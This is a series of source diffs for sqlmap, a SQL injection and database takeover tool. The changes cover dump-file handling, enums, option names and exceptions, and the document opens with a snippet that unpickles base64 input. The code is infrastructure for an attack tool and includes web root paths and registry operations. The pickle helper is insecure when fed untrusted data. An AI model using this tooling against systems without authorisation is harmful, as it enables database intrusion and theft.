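                 lambda v: pickle.dumps(str(v), pickle.HIGHEST_PROTOCOL)):
        try:
            return base64.b64encode(dump(value))
        except Exception:
            continue
    return None

def base64unpickle(value):
    try:
        return pickle.loads(base64.b64decode(value))
    except TypeError:
        return pickle.loads(base64.b64decode(bytes(value)))

print(base64unpickle(base64pickle({"user": "admin"})))  # {'user': 'admin'}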
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -75,7 +75,7 @@ class AttribDict(dict):
for attr in dir(self):
if not attr.startswith('_'):
value = getattr(self, attr)
-if not isinstance(value, (types.BuiltinFunctionType, types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
+if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
setattr(retVal, attr, copy.deepcopy(value, memo))

for key, value in self.items():

@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -138,7 +138,7 @@ DBMS_DICT = {
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"),
-DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
+DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
}

FROM_DUMMY_TABLE = {
@@ -203,9 +203,11 @@ SQL_STATEMENTS = {

POST_HINT_CONTENT_TYPES = {
POST_HINT.JSON: "application/json",
+POST_HINT.JSON_LIKE: "application/json",
POST_HINT.MULTIPART: "multipart/form-data",
POST_HINT.SOAP: "application/soap+xml",
POST_HINT.XML: "application/xml",
+POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
}

DEPRECATED_OPTIONS = {
@@ -213,6 +215,7 @@ DEPRECATED_OPTIONS = {
"--no-unescape": "use '--no-escape' instead",
"--binary": "use '--binary-fields' instead",
"--check-payload": None,
+"--check-waf": None,
}

DUMP_DATA_PREPROCESS = {
@@ -222,5 +225,5 @@ DUMP_DATA_PREPROCESS = {

DEFAULT_DOC_ROOTS = {
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/Inetpub/wwwroot/"),
-OS.LINUX: ("/var/www/",)
+OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
}
lib/core/dump.py (144)
@@ -1,16 +1,18 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

+import cgi
import codecs
+import hashlib
import os
+import re
+import tempfile
import threading

-from xml.dom.minidom import getDOMImplementation

from lib.core.common import Backend
from lib.core.common import dataToDumpFile
from lib.core.common import dataToStdout
@@ -20,7 +22,9 @@ from lib.core.common import normalizeUnicode
from lib.core.common import openFile
from lib.core.common import prioritySortColumns
from lib.core.common import randomInt
+from lib.core.common import randomStr
from lib.core.common import safeCSValue
+from lib.core.common import unicodeencode
from lib.core.common import unsafeSQLIdentificatorNaming
from lib.core.data import conf
from lib.core.data import kb
@@ -32,12 +36,15 @@ from lib.core.enums import DBMS
from lib.core.enums import DUMP_FORMAT
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapValueException
+from lib.core.exception import SqlmapSystemException
from lib.core.replication import Replication
from lib.core.settings import HTML_DUMP_CSS_STYLE
+from lib.core.settings import IS_WIN
from lib.core.settings import METADB_SUFFIX
from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
from lib.core.settings import UNICODE_ENCODING
+from lib.core.settings import WINDOWS_RESERVED_NAMES
from thirdparty.magic import magic

from extra.safe2bin.safe2bin import safechardecode
@@ -66,17 +73,28 @@ class Dump(object):
if kb.get("multiThreadMode"):
self._lock.acquire()

-self._outputFP.write(text)
+try:
+self._outputFP.write(text)
+except IOError, ex:
+errMsg = "error occurred while writing to log file ('%s')" % ex
+raise SqlmapGenericException(errMsg)

if kb.get("multiThreadMode"):
self._lock.release()

kb.dataOutputFlag = True

+def flush(self):
+if self._outputFP:
+try:
+self._outputFP.flush()
+except IOError:
+pass

def setOutputFile(self):
-self._outputFile = "%s%slog" % (conf.outputPath, os.sep)
+self._outputFile = os.path.join(conf.outputPath, "log")
try:
-self._outputFP = codecs.open(self._outputFile, "ab" if not conf.flushSession else "wb", UNICODE_ENCODING)
+self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
except IOError, ex:
errMsg = "error occurred while opening log file ('%s')" % ex
raise SqlmapGenericException(errMsg)
@@ -143,7 +161,7 @@ class Dump(object):
def currentDb(self, data):
if Backend.isDbms(DBMS.MAXDB):
self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
-elif Backend.isDbms(DBMS.ORACLE):
+elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL):
self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
else:
self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB)
@@ -367,6 +385,7 @@ class Dump(object):
rtable = None
dumpFP = None
appendToFile = False
+warnFile = False

if tableValues is None:
return
@@ -380,15 +399,45 @@ class Dump(object):
self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
return

-dumpDbPath = "%s%s%s" % (conf.dumpPath, os.sep, unsafeSQLIdentificatorNaming(db))
+_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(db)))
+if len(_) < len(db) or IS_WIN and db.upper() in WINDOWS_RESERVED_NAMES:
+_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
+dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))
+warnFile = True
+else:
+dumpDbPath = os.path.join(conf.dumpPath, _)

if conf.dumpFormat == DUMP_FORMAT.SQLITE:
-replication = Replication("%s%s%s.sqlite3" % (conf.dumpPath, os.sep, unsafeSQLIdentificatorNaming(db)))
+replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
if not os.path.isdir(dumpDbPath):
-os.makedirs(dumpDbPath, 0755)
+try:
+os.makedirs(dumpDbPath, 0755)
+except (OSError, IOError), ex:
+try:
+tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
+except IOError, _:
+errMsg = "unable to write to the temporary directory ('%s'). " % _
+errMsg += "Please make sure that your disk is not full and "
+errMsg += "that you have sufficient write permissions to "
+errMsg += "create temporary files and/or directories"
+raise SqlmapSystemException(errMsg)

+warnMsg = "unable to create dump directory "
+warnMsg += "'%s' (%s). " % (dumpDbPath, ex)
+warnMsg += "Using temporary directory '%s' instead" % tempDir
+logger.warn(warnMsg)

+dumpDbPath = tempDir

+_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
+if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
+_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table)))
+dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
+warnFile = True
+else:
+dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))

-dumpFileName = "%s%s%s.%s" % (dumpDbPath, os.sep, unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())
appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab")

@@ -399,6 +448,10 @@ class Dump(object):

columns = prioritySortColumns(tableValues.keys())

+if conf.col:
+cols = conf.col.split(',')
+columns = sorted(columns, key=lambda _: cols.index(_) if _ in cols else 0)

for column in columns:
if column != "__infos__":
info = tableValues[column]
@@ -442,8 +495,11 @@ class Dump(object):

rtable = replication.createTable(table, cols)
elif conf.dumpFormat == DUMP_FORMAT.HTML:
-documentNode = getDOMImplementation().createDocument(None, "table", None)
-tableNode = documentNode.documentElement
+dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n")
+dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING)
+dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table)))
+dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE)
+dataToDumpFile(dumpFP, "\n</head>\n<body>\n<table>\n<thead>\n<tr>\n")

if count == 1:
self._write("[1 entry]")
@@ -452,14 +508,6 @@ class Dump(object):

self._write(separator)

-if conf.dumpFormat == DUMP_FORMAT.HTML:
-headNode = documentNode.createElement("thead")
-rowNode = documentNode.createElement("tr")
-tableNode.appendChild(headNode)
-headNode.appendChild(rowNode)
-bodyNode = documentNode.createElement("tbody")
-tableNode.appendChild(bodyNode)

for column in columns:
if column != "__infos__":
info = tableValues[column]
@@ -477,12 +525,13 @@ class Dump(object):
else:
dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(column), conf.csvDel))
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
entryNode = documentNode.createElement("td")
|
dataToDumpFile(dumpFP, "<th>%s</th>" % cgi.escape(column).encode("ascii", "xmlcharrefreplace"))
|
||||||
rowNode.appendChild(entryNode)
|
|
||||||
entryNode.appendChild(documentNode.createTextNode(column))
|
|
||||||
|
|
||||||
field += 1
|
field += 1
|
||||||
|
|
||||||
|
if conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
|
dataToDumpFile(dumpFP, "\n</tr>\n</thead>\n<tbody>\n")
|
||||||
|
|
||||||
self._write("|\n%s" % separator)
|
self._write("|\n%s" % separator)
|
||||||
|
|
||||||
if conf.dumpFormat == DUMP_FORMAT.CSV:
|
if conf.dumpFormat == DUMP_FORMAT.CSV:
|
||||||
|
@ -503,8 +552,7 @@ class Dump(object):
|
||||||
values = []
|
values = []
|
||||||
|
|
||||||
if conf.dumpFormat == DUMP_FORMAT.HTML:
|
if conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
rowNode = documentNode.createElement("tr")
|
dataToDumpFile(dumpFP, "<tr>")
|
||||||
bodyNode.appendChild(rowNode)
|
|
||||||
|
|
||||||
for column in columns:
|
for column in columns:
|
||||||
if column != "__infos__":
|
if column != "__infos__":
|
||||||
|
@ -525,18 +573,21 @@ class Dump(object):
|
||||||
self._write("| %s%s" % (value, blank), newline=False, console=console)
|
self._write("| %s%s" % (value, blank), newline=False, console=console)
|
||||||
|
|
||||||
if len(value) > MIN_BINARY_DISK_DUMP_SIZE and r'\x' in value:
|
if len(value) > MIN_BINARY_DISK_DUMP_SIZE and r'\x' in value:
|
||||||
mimetype = magic.from_buffer(value, mime=True)
|
try:
|
||||||
if any(mimetype.startswith(_) for _ in ("application", "image")):
|
mimetype = magic.from_buffer(value, mime=True)
|
||||||
if not os.path.isdir(dumpDbPath):
|
if any(mimetype.startswith(_) for _ in ("application", "image")):
|
||||||
os.makedirs(dumpDbPath, 0755)
|
if not os.path.isdir(dumpDbPath):
|
||||||
|
os.makedirs(dumpDbPath, 0755)
|
||||||
|
|
||||||
filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (unsafeSQLIdentificatorNaming(column), randomInt(8)))
|
filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (unsafeSQLIdentificatorNaming(column), randomInt(8)))
|
||||||
warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath)
|
warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
with open(filepath, "wb") as f:
|
with open(filepath, "wb") as f:
|
||||||
_ = safechardecode(value, True)
|
_ = safechardecode(value, True)
|
||||||
f.write(_)
|
f.write(_)
|
||||||
|
except magic.MagicException, err:
|
||||||
|
logger.debug(str(err))
|
||||||
|
|
||||||
if conf.dumpFormat == DUMP_FORMAT.CSV:
|
if conf.dumpFormat == DUMP_FORMAT.CSV:
|
||||||
if field == fields:
|
if field == fields:
|
||||||
|
@ -544,9 +595,7 @@ class Dump(object):
|
||||||
else:
|
else:
|
||||||
dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(value), conf.csvDel))
|
dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(value), conf.csvDel))
|
||||||
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
entryNode = documentNode.createElement("td")
|
dataToDumpFile(dumpFP, "<td>%s</td>" % cgi.escape(value).encode("ascii", "xmlcharrefreplace"))
|
||||||
rowNode.appendChild(entryNode)
|
|
||||||
entryNode.appendChild(documentNode.createTextNode(value))
|
|
||||||
|
|
||||||
field += 1
|
field += 1
|
||||||
|
|
||||||
|
@ -557,6 +606,8 @@ class Dump(object):
|
||||||
pass
|
pass
|
||||||
elif conf.dumpFormat == DUMP_FORMAT.CSV:
|
elif conf.dumpFormat == DUMP_FORMAT.CSV:
|
||||||
dataToDumpFile(dumpFP, "\n")
|
dataToDumpFile(dumpFP, "\n")
|
||||||
|
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
|
dataToDumpFile(dumpFP, "</tr>\n")
|
||||||
|
|
||||||
self._write("|", console=console)
|
self._write("|", console=console)
|
||||||
|
|
||||||
|
@ -568,17 +619,16 @@ class Dump(object):
|
||||||
|
|
||||||
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
||||||
if conf.dumpFormat == DUMP_FORMAT.HTML:
|
if conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n")
|
dataToDumpFile(dumpFP, "</tbody>\n</table>\n</body>\n</html>")
|
||||||
dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING)
|
|
||||||
dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table)))
|
|
||||||
dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE)
|
|
||||||
dataToDumpFile(dumpFP, "\n</head>\n")
|
|
||||||
dataToDumpFile(dumpFP, tableNode.toxml())
|
|
||||||
dataToDumpFile(dumpFP, "\n</html>")
|
|
||||||
else:
|
else:
|
||||||
dataToDumpFile(dumpFP, "\n")
|
dataToDumpFile(dumpFP, "\n")
|
||||||
dumpFP.close()
|
dumpFP.close()
|
||||||
logger.info("table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName))
|
|
||||||
|
msg = "table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName)
|
||||||
|
if not warnFile:
|
||||||
|
logger.info(msg)
|
||||||
|
else:
|
||||||
|
logger.warn(msg)
|
||||||
|
|
||||||
def dbColumns(self, dbColumnsDict, colConsider, dbs):
|
def dbColumns(self, dbColumnsDict, colConsider, dbs):
|
||||||
if hasattr(conf, "api"):
|
if hasattr(conf, "api"):
|
||||||
|
|
|
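The dbTableValues() hunks above replace the bare os.makedirs() call with a guarded version that falls back to a temporary directory and raises the new SqlmapSystemException only when even that fails. A minimal standalone sketch of the same fallback pattern (the helper name and print-based logging are illustrative, not sqlmap code):

```python
import os
import tempfile

def ensure_dump_directory(path):
    """Return a usable dump directory, falling back to a temporary one.

    Sketch of the fallback pattern used in Dump.dbTableValues(); the
    'sqlmapdb' prefix mirrors the diff, everything else is illustrative.
    """
    if os.path.isdir(path):
        return path
    try:
        os.makedirs(path, 0o755)
        return path
    except (OSError, IOError) as ex:
        # Directory creation failed (permissions, full disk, reserved name, ...):
        # fall back to a freshly created temporary directory instead of aborting.
        temp_dir = tempfile.mkdtemp(prefix="sqlmapdb")
        print("unable to create dump directory '%s' (%s); using '%s' instead" % (path, ex, temp_dir))
        return temp_dir
```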
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -71,8 +71,10 @@ class PLACE:
 class POST_HINT:
     SOAP = "SOAP"
     JSON = "JSON"
+    JSON_LIKE = "JSON-like"
     MULTIPART = "MULTIPART"
     XML = "XML (generic)"
+    ARRAY_LIKE = "Array-like"
 
 class HTTPMETHOD:
     GET = "GET"
@@ -135,9 +137,15 @@ class MOBILES:
 
 class PROXY_TYPE:
     HTTP = "HTTP"
+    HTTPS = "HTTPS"
     SOCKS4 = "SOCKS4"
     SOCKS5 = "SOCKS5"
 
+class REGISTRY_OPERATION:
+    READ = "read"
+    ADD = "add"
+    DELETE = "delete"
+
 class DUMP_FORMAT:
     CSV = "CSV"
     HTML = "HTML"
@@ -158,6 +166,7 @@ class HTTP_HEADER:
     COOKIE = "Cookie"
     SET_COOKIE = "Set-Cookie"
     HOST = "Host"
+    LOCATION = "Location"
     PRAGMA = "Pragma"
     PROXY_AUTHORIZATION = "Proxy-Authorization"
     PROXY_CONNECTION = "Proxy-Connection"
@@ -166,12 +175,19 @@ class HTTP_HEADER:
     SERVER = "Server"
     USER_AGENT = "User-Agent"
     TRANSFER_ENCODING = "Transfer-Encoding"
+    URI = "URI"
     VIA = "Via"
 
 class EXPECTED:
     BOOL = "bool"
     INT = "int"
 
+class OPTION_TYPE:
+    BOOLEAN = "boolean"
+    INTEGER = "integer"
+    FLOAT = "float"
+    STRING = "string"
+
 class HASHDB_KEYS:
     DBMS = "DBMS"
     CONF_TMP_PATH = "CONF_TMP_PATH"
@@ -192,10 +208,10 @@ class PAYLOAD:
     SQLINJECTION = {
         1: "boolean-based blind",
         2: "error-based",
-        3: "UNION query",
+        3: "inline query",
         4: "stacked queries",
         5: "AND/OR time-based blind",
-        6: "inline query",
+        6: "UNION query",
     }
 
     PARAMETER = {
@@ -234,10 +250,10 @@ class PAYLOAD:
     class TECHNIQUE:
         BOOLEAN = 1
         ERROR = 2
-        UNION = 3
+        QUERY = 3
         STACKED = 4
         TIME = 5
-        QUERY = 6
+        UNION = 6
 
     class WHERE:
         ORIGINAL = 1
@@ -323,4 +339,9 @@ class AUTH_TYPE:
     BASIC = "basic"
     DIGEST = "digest"
     NTLM = "ntlm"
-    CERT = "cert"
+    PKI = "pki"
+
+class AUTOCOMPLETE_TYPE:
+    SQL = 0
+    OS = 1
+    SQLMAP = 2
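The PAYLOAD.SQLINJECTION map and the nested TECHNIQUE class above swap the numeric slots of "inline query" (now 3) and "UNION query" (now 6). A small sketch, using simplified copies of those enums, of why call sites that go through the named constants are unaffected by the renumbering:

```python
# Simplified copies of the enums changed above, for illustration only.
class TECHNIQUE:
    BOOLEAN = 1
    ERROR = 2
    QUERY = 3
    STACKED = 4
    TIME = 5
    UNION = 6

SQLINJECTION = {
    1: "boolean-based blind",
    2: "error-based",
    3: "inline query",
    4: "stacked queries",
    5: "AND/OR time-based blind",
    6: "UNION query",
}

def describe(technique):
    # Referencing TECHNIQUE.UNION keeps working even though its value moved from 3 to 6
    return SQLINJECTION[technique]

assert describe(TECHNIQUE.UNION) == "UNION query"
assert describe(TECHNIQUE.QUERY) == "inline query"
```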
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -23,6 +23,9 @@ class SqlmapFilePathException(SqlmapBaseException):
 class SqlmapGenericException(SqlmapBaseException):
     pass
 
+class SqlmapInstallationException(SqlmapBaseException):
+    pass
+
 class SqlmapMissingDependence(SqlmapBaseException):
     pass
 
@@ -44,12 +47,21 @@ class SqlmapSilentQuitException(SqlmapBaseException):
 class SqlmapUserQuitException(SqlmapBaseException):
     pass
 
+class SqlmapShellQuitException(SqlmapBaseException):
+    pass
+
 class SqlmapSyntaxException(SqlmapBaseException):
     pass
 
+class SqlmapSystemException(SqlmapBaseException):
+    pass
+
 class SqlmapThreadException(SqlmapBaseException):
     pass
 
+class SqlmapTokenException(SqlmapBaseException):
+    pass
+
 class SqlmapUndefinedMethod(SqlmapBaseException):
     pass
 
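The new exception types above (SqlmapInstallationException, SqlmapShellQuitException, SqlmapSystemException, SqlmapTokenException) all derive from SqlmapBaseException; SqlmapSystemException is the one raised by the dump code earlier in this commit when no writable directory can be found. A hedged sketch with a reduced copy of the hierarchy and a typical call site:

```python
# Reduced stand-in for lib/core/exception.py, for illustration only.
class SqlmapBaseException(Exception):
    pass

class SqlmapSystemException(SqlmapBaseException):
    pass

def write_report(path, data):
    try:
        with open(path, "wb") as f:
            f.write(data)
    except (OSError, IOError) as ex:
        # Environment problems (full disk, missing permissions) are surfaced as a
        # dedicated exception type so callers can tell them apart from code bugs.
        raise SqlmapSystemException("unable to write '%s' (%s)" % (path, ex))

try:
    write_report("/nonexistent/dir/report.txt", b"test")
except SqlmapSystemException as ex:
    print("system error: %s" % ex)
```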
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -41,4 +41,4 @@ FORMATTER = logging.Formatter("\r[%(asctime)s] [%(levelname)s] %(message)s", "%H
 
 LOGGER_HANDLER.setFormatter(FORMATTER)
 LOGGER.addHandler(LOGGER_HANDLER)
-LOGGER.setLevel(logging.WARN)
+LOGGER.setLevel(logging.INFO)
File diff suppressed because it is too large
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -19,12 +19,15 @@ optDict = {
         "sessionFile": "string",
         "googleDork": "string",
         "configFile": "string",
+        "sitemapUrl": "string",
     },
 
     "Request": {
+        "method": "string",
         "data": "string",
-        "pDel": "string",
+        "paramDel": "string",
         "cookie": "string",
+        "cookieDel": "string",
         "loadCookies": "string",
         "dropSetCookie": "boolean",
         "agent": "string",
@@ -32,11 +35,12 @@ optDict = {
         "host": "string",
         "referer": "string",
         "headers": "string",
-        "aType": "string",
-        "aCred": "string",
-        "aCert": "string",
+        "authType": "string",
+        "authCred": "string",
+        "authPrivate": "string",
         "proxy": "string",
-        "pCred": "string",
+        "proxyCred": "string",
+        "proxyFile": "string",
         "ignoreProxy": "boolean",
         "tor": "boolean",
         "torPort": "integer",
@@ -46,9 +50,13 @@ optDict = {
         "timeout": "float",
         "retries": "integer",
         "rParam": "string",
-        "safUrl": "string",
-        "saFreq": "integer",
+        "safeUrl": "string",
+        "safePost": "string",
+        "safeReqFile": "string",
+        "safeFreq": "integer",
         "skipUrlEncode": "boolean",
+        "csrfToken": "string",
+        "csrfUrl": "string",
         "forceSSL": "boolean",
         "hpp": "boolean",
         "evalCode": "string",
@@ -65,11 +73,13 @@ optDict = {
     "Injection": {
         "testParameter": "string",
         "skip": "string",
+        "skipStatic": "boolean",
         "dbms": "string",
         "dbmsCred": "string",
         "os": "string",
         "invalidBignum": "boolean",
         "invalidLogical": "boolean",
+        "invalidString": "boolean",
         "noCast": "boolean",
         "noEscape": "boolean",
         "prefix": "string",
@@ -121,9 +131,12 @@ optDict = {
         "dumpTable": "boolean",
         "dumpAll": "boolean",
         "search": "boolean",
+        "getComments": "boolean",
         "db": "string",
         "tbl": "string",
         "col": "string",
+        "excludeCol": "string",
+        "dumpWhere": "string",
         "user": "string",
         "excludeSysDbs": "boolean",
         "limitStart": "integer",
@@ -178,6 +191,7 @@ optDict = {
         "batch": "boolean",
         "charset": "string",
         "crawlDepth": "integer",
+        "crawlExclude": "string",
         "csvDel": "string",
         "dumpFormat": "string",
         "eta": "boolean",
@@ -185,7 +199,7 @@ optDict = {
         "forms": "boolean",
         "freshQueries": "boolean",
         "hexConvert": "boolean",
-        "oDir": "string",
+        "outputDir": "string",
         "parseErrors": "boolean",
         "pivotColumn": "string",
         "saveCmdline": "boolean",
@@ -199,7 +213,6 @@ optDict = {
         "alert": "string",
         "answers": "string",
         "beep": "boolean",
-        "checkWaf": "boolean",
         "cleanup": "boolean",
         "dependencies": "boolean",
         "disableColoring": "boolean",
@@ -218,6 +231,7 @@ optDict = {
         "cpuThrottle": "integer",
         "forceDns": "boolean",
         "identifyWaf": "boolean",
+        "ignore401": "boolean",
         "smokeTest": "boolean",
         "liveTest": "boolean",
         "stopFail": "boolean",
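optDict maps every option to a declared datatype ("string", "boolean", "integer", "float"), and the renames above (pDel to paramDel, aType to authType, oDir to outputDir, and so on) keep those keys aligned with the option destinations. A hypothetical helper, not sqlmap code, showing how such a type map can drive coercion of raw configuration values:

```python
# Hypothetical helper (not part of sqlmap) using an optDict-style type map
# to coerce raw text values read from a configuration file.
OPTION_TYPES = {
    "paramDel": "string",
    "dropSetCookie": "boolean",
    "torPort": "integer",
    "timeout": "float",
}

def coerce_option(name, raw):
    kind = OPTION_TYPES.get(name, "string")
    if kind == "boolean":
        return raw.strip().lower() in ("1", "true", "yes", "on")
    if kind == "integer":
        return int(raw)
    if kind == "float":
        return float(raw)
    return raw

assert coerce_option("torPort", "9050") == 9050
assert coerce_option("dropSetCookie", "True") is True
assert coerce_option("timeout", "30.5") == 30.5
```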
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -1,15 +1,17 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 import os
+import random
 import re
 import subprocess
 import string
 import sys
+import time
 
 from lib.core.enums import DBMS
 from lib.core.enums import DBMS_DIRECTORY_NAME
@@ -19,17 +21,28 @@ from lib.core.revision import getRevisionNumber
 # sqlmap version and site
 VERSION = "1.0-dev"
 REVISION = getRevisionNumber()
-VERSION_STRING = "sqlmap/%s%s" % (VERSION, "-%s" % REVISION if REVISION else "")
+VERSION_STRING = "sqlmap/%s%s" % (VERSION, "-%s" % REVISION if REVISION else "-nongit-%s" % time.strftime("%Y%m%d", time.gmtime(os.path.getctime(__file__))))
 DESCRIPTION = "automatic SQL injection and database takeover tool"
 SITE = "http://sqlmap.org"
 ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
